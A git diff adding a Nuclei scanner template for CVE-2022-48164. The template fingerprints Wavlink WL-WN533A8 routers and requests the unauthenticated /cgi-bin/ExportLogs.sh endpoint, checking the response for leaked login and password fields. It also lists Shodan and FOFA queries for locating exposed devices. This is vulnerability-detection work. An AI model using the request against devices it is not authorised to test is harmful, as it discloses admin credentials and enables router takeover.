commit
3373f2b7b5
|
@ -0,0 +1,50 @@
|
|||
id: CVE-2022-48164
|
||||
|
||||
info:
|
||||
name: Wavlink WL-WN533A8 M33A8.V5030.190716 - Information Disclosure
|
||||
author: ritikchaddha
|
||||
severity: high
|
||||
description: |
|
||||
An access control issue in the component /cgi-bin/ExportLogs.sh of Wavlink WL-WN533A8 M33A8.V5030.190716 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials.
|
||||
impact: |
|
||||
Successful exploitation could lead to sensitive information disclosure.
|
||||
reference:
|
||||
- https://docs.google.com/document/d/1JgqpBYRxyU0WKDSqkvi4Yo0723k7mrIUeuH9i1eEs8U/edit?tab=t.0
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-48164
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2022-48164
|
||||
cpe: cpe:2.3:o:wavlink:wl-wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
vendor: wavlink
|
||||
product: wl-wn533a8_firmware
|
||||
shodan-query: html:"WN533A8"
|
||||
fofa-query: body="WN533A8"
|
||||
tags: cve,cve2022,wavlink,exposure,wn533a8
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "WN533A8")'
|
||||
internal: true
|
||||
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/ExportLogs.sh"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains_all(body, "Login=", "Password=", "WiFi_", "WAVLINK")'
|
||||
- 'contains(content_type, "application/octet-stream")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
Loading…
Reference in New Issue